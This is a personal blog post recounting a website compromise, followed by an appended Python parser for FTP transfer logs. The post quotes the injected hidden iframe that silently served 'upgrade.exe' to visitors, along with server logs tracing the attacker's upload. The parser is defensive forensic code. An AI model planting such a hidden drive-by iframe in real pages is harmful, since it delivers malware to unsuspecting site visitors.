Into the Void

Back off, man, I’m co-creating my reality.

Monday
14/09/2008

2:06 pm

blst.php

Found this in my error log. Apparently somebody drops nasties in people’s image directories and induces other folks to access the nasty. Fortunately the file doesn’t exist in my image directory. I can’t guess whether it was ever there, or whether the tech guys at laughingsquid removed it for me.

I see from looking online that if it were there, it would download a Bagel variant.

[Mon Jun 09 08:55:14 2008] [error] [client 63.123.82.75] script ‘/var/www/vhosts/bipolarplanet.com/httpdocs/index.php’ not found or unable to stat, referer: http://bipolarplanet.com/images/blst.php

Sunday
22/18/2007

10:11 pm

Hacked

Found this f*cker at the bottom of index.php. The file was in the top level and IE kindly downloaded it for me. It’s late, it’s my own site, and I wasn’t paying attention. I ran it. I don’t know what’s going to happen. I’m running a McAfee scan - it didn’t flag the executable - and I suppose I should grab AdAware or Spybot S&D or both.

<IFRAME name='StatPage'
src='upgrade.exe' width=5 height=5
style='display:none'></IFRAME>

Now if you’ll excuse me, I’m going to go boil my laptop.

Update 11/19:
IE went out to a bunch of sites this morning looking for a page called hltraff.php. Not good. It also killed McAfee and won’t let me do a system restore. I found the installation and as I looked at the file it disappeared from the directory. I guess I’m going to have to reformat and start over.

Update 11/25:
I am so pwned.

First access of this file - the first person who was infected by my site - gives me an idea when it was uploaded to my server.

68.14.90.4 - - [18/Nov/2007:07:23:21 -0800] "GET /~void/tag/t-gondii/upgrade.exe HTTP/1.1" 404 31911 "http://www.bipolarplanet.com/~void/tag/t-gondii/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9"

That’s someone who my webpage may have infected. After that the accesses come several times a page.

This is the ftp access where the hacker uploaded the infection and the hacked index.php:

Sun Nov 18 15:12:32 2007 0 66.246.252.53 94 /var/www/vhosts/bipolarplanet.com/web_users/void/index.php b _ o r void ftp 0 * c
Sun Nov 18 15:12:51 2007 18 66.246.252.53 543744 /var/www/vhosts/bipolarplanet.com/web_users/void/upgrade.exe b _ i r void ftp 0 * c
Sun Nov 18 15:12:51 2007 0 66.246.252.53 94 /var/www/vhosts/bipolarplanet.com/web_users/void/index.php b _ d r void ftp 0 * c
Sun Nov 18 15:12:51 2007 0 66.246.252.53 185 /var/www/vhosts/bipolarplanet.com/web_users/void/index.php b _ i r void ftp 0 * c
Sun Nov 18 15:42:47 2007 0 66.246.252.53 185 /var/www/vhosts/bipolarplanet.com/web_users/void/index.php b _ o r void ftp 0 * c
Mon Nov 19 02:46:36 2007 0 69.141.48.56 185 /var/www/vhosts/bipolarplanet.com/web_users/void/index.php a _ o r void ftp 0 * c
Mon Nov 19 02:50:33 2007 0 69.141.48.56 185 /var/www/vhosts/bipolarplanet.com/web_users/void/index.php a _ o r void ftp 0 * c
Mon Nov 19 02:55:12 2007 0 69.141.48.56 95 /var/www/vhosts/bipolarplanet.com/web_users/void/index.php a _ i r void ftp 0 * c
Mon Nov 19 03:05:05 2007 0 69.141.48.56 185 /var/www/vhosts/bipolarplanet.com/web_users/void/indexhacked.php a _ o r void ftp 0 * c
Mon Nov 19 03:52:48 2007 0 69.141.48.56 17 /var/www/vhosts/bipolarplanet.com/web_users/void/ftpchk3.txt a _ o r void ftp 0 * c
Mon Nov 19 03:52:58 2007 0 69.141.48.56 17 /var/www/vhosts/bipolarplanet.com/web_users/void/ftpchk3.txt a _ d r void ftp 0 * c

66.246.252.53 resolves to sr178.2dayhost.com - that’s the hacker.
69.141.48.56 resolves to c-69-141-48-56.hsd1.pa.comcast.net - that’s me.
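As an added example (not part of the original post), here is a small Python parser for xferlog lines like the ones above that rebuilds the timeline per remote host and flags uploads or deletes of web-facing files from hosts the site owner does not recognise. The list of known hosts is an assumption; the sample lines are copied from the post.

```python
import re
from collections import defaultdict
from datetime import datetime

# xferlog format (wu-ftpd/proftpd): date, transfer seconds, remote host, size, path,
# transfer type (a/b), special action, direction (o=out/i=in/d=delete), access mode,
# user, service, auth method, auth user id, completion status.
XFERLOG_RE = re.compile(
    r"^(?P<when>\w{3} \w{3} +\d+ \d\d:\d\d:\d\d \d{4}) (?P<secs>\d+) (?P<host>\S+) "
    r"(?P<size>\d+) (?P<path>\S+) (?P<type>[ab]) (?P<special>\S) (?P<dir>[oid]) "
    r"(?P<mode>[ar]) (?P<user>\S+) (?P<service>\S+) (?P<auth>\d) (?P<authid>\S+) "
    r"(?P<status>[ci])$"
)
DIRECTION = {"o": "download", "i": "upload", "d": "delete"}

# Lines copied from the FTP log in the post above.
SAMPLE_LOG = """\
Sun Nov 18 15:12:32 2007 0 66.246.252.53 94 /var/www/vhosts/bipolarplanet.com/web_users/void/index.php b _ o r void ftp 0 * c
Sun Nov 18 15:12:51 2007 18 66.246.252.53 543744 /var/www/vhosts/bipolarplanet.com/web_users/void/upgrade.exe b _ i r void ftp 0 * c
Sun Nov 18 15:12:51 2007 0 66.246.252.53 94 /var/www/vhosts/bipolarplanet.com/web_users/void/index.php b _ d r void ftp 0 * c
Sun Nov 18 15:12:51 2007 0 66.246.252.53 185 /var/www/vhosts/bipolarplanet.com/web_users/void/index.php b _ i r void ftp 0 * c
Sun Nov 18 15:42:47 2007 0 66.246.252.53 185 /var/www/vhosts/bipolarplanet.com/web_users/void/index.php b _ o r void ftp 0 * c
Mon Nov 19 02:46:36 2007 0 69.141.48.56 185 /var/www/vhosts/bipolarplanet.com/web_users/void/index.php a _ o r void ftp 0 * c
"""

def parse_xferlog(text):
    """Parse xferlog lines into dicts; lines that do not match are skipped."""
    records = []
    for line in text.splitlines():
        m = XFERLOG_RE.match(line.strip())
        if not m:
            continue
        rec = m.groupdict()
        # Day-of-month is space padded below 10 ("Nov  9"); collapse before strptime.
        rec["when"] = datetime.strptime(" ".join(rec["when"].split()), "%a %b %d %H:%M:%S %Y")
        rec["size"] = int(rec["size"])
        rec["dir"] = DIRECTION[rec["dir"]]
        records.append(rec)
    return records

def timeline_by_host(records):
    """Map remote host -> chronological (time, action, basename) tuples."""
    out = defaultdict(list)
    for r in sorted(records, key=lambda r: r["when"]):
        out[r["host"]].append((r["when"], r["dir"], r["path"].rsplit("/", 1)[-1]))
    return dict(out)

def suspicious_transfers(records, known_hosts, watched=(".php", ".exe", ".htaccess")):
    """Uploads/deletes of web-facing files from hosts not in the owner's known set."""
    return [r for r in records
            if r["host"] not in known_hosts and r["dir"] != "download"
            and r["path"].lower().endswith(watched)]
```

Running `suspicious_transfers(parse_xferlog(SAMPLE_LOG), {"69.141.48.56"})` with the owner's Comcast address as the only known host isolates the three writes from 66.246.252.53, the earliest of which (the 543744-byte upgrade.exe at 15:12:51) dates the compromise.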
